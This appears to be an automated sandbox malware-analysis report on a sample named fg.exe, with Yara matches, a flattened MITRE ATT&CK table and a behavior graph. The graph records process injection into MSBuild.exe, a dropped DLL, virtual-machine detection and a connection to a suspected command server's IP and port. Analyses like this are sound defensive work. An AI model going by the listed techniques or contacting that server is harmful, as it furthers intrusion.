            Source: Yara matchFile source: 4.2.fg.exe.5150600.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.fg.exe.2c99014.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1392608875.00000000009DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1390048406.00000000009CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1392073951.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000003.1390119908.00000000009D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: fg.exe PID: 7816, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6364, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 516, type: MEMORYSTR
            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll, type: DROPPED

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
            Windows Management Instrumentation            		1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		OS Credential Dumping131
            Security Software Discovery            		Remote Services11
            Archive Collected Data            		12
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Native API            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop ProtocolData from Removable Media1
            Non-Standard Port            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)141
            Virtualization/Sandbox Evasion            		Security Account Manager141
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture2
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets13
            System Information Discovery            		SSHKeylogging13
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Software Packing            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Timestomp            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632841 Sample: fg.exe Startdate: 09/03/2025 Architecture: WINDOWS Score: 100 37 pki-goog.l.google.com 2->37 39 c.pki.goog 2->39 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 14 other signatures 2->49 8 fg.exe 8 2->8         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\cy31atwy.cmdline, Unicode 8->31 dropped 33 C:\Users\user\AppData\Local\...\cy31atwy.0.cs, Unicode 8->33 dropped 35 C:\Users\user\AppData\Local\...\fg.exe.log, CSV 8->35 dropped 51 Writes to foreign memory regions 8->51 53 Allocates memory in foreign processes 8->53 55 Compiles code for process injection (via .Net compiler) 8->55 57 Injects a PE file into a foreign processes 8->57 12 MSBuild.exe 8->12         started        15 MSBuild.exe 2 8->15         started        18 csc.exe 3 8->18         started        21 conhost.exe 8->21         started        signatures6 process7 dnsIp8 59 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->59 41 185.7.214.108, 4411, 49717 DELUNETDE France 15->41 23 WerFault.exe 22 16 15->23         started        29 C:\Users\user\AppData\Local\...\cy31atwy.dll, PE32 18->29 dropped 25 conhost.exe 18->25         started        27 cvtres.exe 1 18->27         started        file9 signatures10 process11

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.